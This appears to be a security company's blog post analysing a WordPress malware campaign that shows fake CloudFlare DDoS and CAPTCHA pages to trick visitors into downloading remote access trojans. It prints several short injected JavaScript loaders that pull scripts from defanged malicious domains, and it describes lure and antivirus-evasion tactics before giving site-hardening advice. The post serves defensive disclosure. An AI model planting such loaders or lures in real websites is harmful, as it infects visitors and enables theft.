New Malware Variants Serve Bogus CloudFlare DDoS Captcha

New Malware Variants Serve Bogus CloudFlare DDoS Captcha

When attackers shift up their campaigns, change their payload or exfiltration domains, and put some extra effort into hiding their malware it’s usually a telltale sign that they are making some money off of their exploits. One such campaign is the fake CloudFlare DDoS pages which we reported on last month.

The attack is simple: when browsing an infected website, the user receives a notification that insists they must download a file to continue to access the content. What they don’t know is that the file is actually a Remote Access Trojan which gives the attackers full access to their system, and is likely paving the way for a ransomware or banking account attack.

As the attack has evolved we’ve detected a number of variants with new obfuscation and exploitation techniques designed to serve fake DDoS warnings and coerce victims into downloading these malicious trojans. Let’s take a look at some of these new variations.

New malware variant with fake CloudFlare CAPTCHA notification
New malware variant with fake CloudFlare CAPTCHA notification

Twist on the sczriptzzbn JavaScript variable

The previous payload was three lines of malicious JavaScript injected into the site code loading content from the malicious domain adogeevent[.]com:

var sczriptzzbn = document.createElement('script');
sczriptzzbn.src = 'hxxps://adogeevent[.]com/id';

The new payload has several variations, including this one:

var sczriptzzbn = document.createElement('script');
sczriptzzbn.src = 'hxxps://luxury-limousine[.]com/browser-js';

Another variant uses the malicious domain skambio-porte[.]com from the same IP ( as adogeevent[.]com and luxury-limousine[.]com.

var sczriptzzbn = document.createElement('script');
sczriptzzbn.src = 'hxxps://skambio-porte[.]com/js1';

Yet another variant is found leveraging obfuscated JavaScript and a similar scriptzzb string. When the sample is deobfuscated, contents reveal a third malicious domain containing an (almost) familiar naming convention for an extremely popular tag service: hxxps://gloogletag[.]com/tagged/ajax.js

var scriptzzb = document.createElement("script");
scriptzzb.src = "hxxps://gloogletag[.]com/tagged/ajax.js";

The attack almost exclusively targets WordPress websites and delivers the payload by appending malicious JavaScript into core, theme, or plugin files.

Here’s are some of the most commonly infected files detected by our remote scanner SiteCheck:

Commonly infected files fake cloudflare DDoS malware

The total number of websites infected with these new variants has been relatively small — slightly less than 1,000 websites in total. The injection was found in /wp-includes/js/jquery/jquery.min.js for almost half of the infected websites.

The fact that the attackers are modifying their payload and going to some lengths to conceal their malware suggests that they are indeed making money off of this. Unfortunately, this also indicates that unsuspecting users are falling victim to their scams.

New exploitation technique with fake CloudFlare CAPTCHA

In the initial wave of this infection the user was prompted with a bogus CloudFlare DDoS protection screen, but in this new wave we see a fake CAPTCHA dialog masquerading as the popular CloudFlare service.

Fake Captcha CloudFlare Alert

If the victim enters any CAPTCHA value into the dialog (even the correct one), they are then prompted to complete a download to avoid completing additional CAPTCHA security checks.

Fake CloudFlare captcha downloads remote access trojan

Clicking on the Download button prompts a malicious .iso file to be downloaded and extracted onto the victim’s machine:

Malicious iso file downloaded from fake CloudFlare notice

The .iso file contains a compressed .exe file titled either CLOUDFLA.EXE or Cloudflare_security_installer.exe. In a further attempt to try to conceal the installation of the trojan it also launches a legitimate Google Chrome update:

Launches Google Chrome update in Russian

However, the updater is set to use Russian, which I expect will leave most computer users starting to second guess their browsing or downloading habits. This browser update is just a distraction, however, since at this point the RAT installer is already running in the background.

According to Jerome Segura, a researcher at MalwareBytes, the malware is the Amadey stealer with the command & control server interestingly hosted in the United States.

Slightly modified payload

The malware is much the same as the previous payload described in our last post, although flagged over 20 security vendors.

However, it’s basically the same NetSupport RAT as before — which also happens to also be common in fake tech support scams. And once again, it’s found bundled with Racoon Stealer.

Kaspersky and others flag the .exe file as a Banking Trojan, so we can expect that a few unfortunate victims will have their bank accounts drained by the attackers — a prudent reminder of why it’s imperative to always have 2FA enabled on your important accounts, particularly those which deal with your finances. This cash flow is exactly what is driving the persistence of these new variants of this website attack.

Variant with anti-virus evasion

We’ve also noticed another similar attack masquerading as a CloudFlare page — but this time with a different payload using anti-virus evasion tactics.

Anti-virus evasion tactics

In this case, the file size for the executable trojan is a huge 669.9 megabytes.

Executable is 669 MB in size

This is a tactic used by attackers to evade detection by antivirus programs, since typically most scans include a file size limit for performance reasons. The payload also includes a note from the attackers instructing the user to run the .exe file to clean their registry (a common ploy used by “potentially unwanted programs” or PUPs like registry cleaners):

Note in malware payload Dear user. The site is undergoing minor technical work. If your website does not work, malicious files have been found in your system that slow down the system.

Most decent anti-virus programs should still block this .exe file from detonating on a victim’s computer if they employ heuristic behavioural analysis of running programs, though.

We have also seen the payload hosted on a GitLab account which has thankfully since been blocked:

Blocked user on GitLab

That said, the attackers continue to host the trojan payload on various hacked websites and other free file sharing services.

How to protect your site from these fake DDoS alerts

These new variants clearly demonstrate how attackers modify their malware to increase evasion and ensure the efficacy of their campaigns. It’s evident that bad actors will go to any lengths to compromise computers and push their malware onto unsuspecting victims.

Since these remote access trojans (RATs) are known to give attackers full control over a compromised device they are considered to be one of the worst types of infections that can affect a computer — and infections should be treated very seriously.

If you are a website owner, there are a number of steps you can take to mitigate risk and protect your website from infection.

Keep all your website software patched

That includes your core CMS, plugins, themes and other extensible components. You can always leverage virtual patching in the event that you’re not able to immediately update your software.

Use strong, unique passwords for all of your accounts

Make your password unpredictable and at least 12 characters long. Try including a combination of special characters, numbers, upper and lowercase characters to improve entropy.

Employ 2FA on your admin panels

Administrator panel compromises are one of the most common attacks that everyday WordPress website admins face. By adding 2FA to your admin panel, you’ll be taking an important step towards securing your site.

Place your site behind a web application firewall

A website firewall will help protect your site from attack. It inspects and filters out bad packets before they even arrive at your site, preventing bad bots and hackers from accessing what they shouldn’t.

Leverage file integrity monitoring

A file integrity monitoring tool will help you identify security issues and indicators of compromise by routinely scanning, monitoring, and verifying the integrity of your website.

If you think that your website has been infected or you want to protect your website against malware, we’re always happy to help.

You May Also Like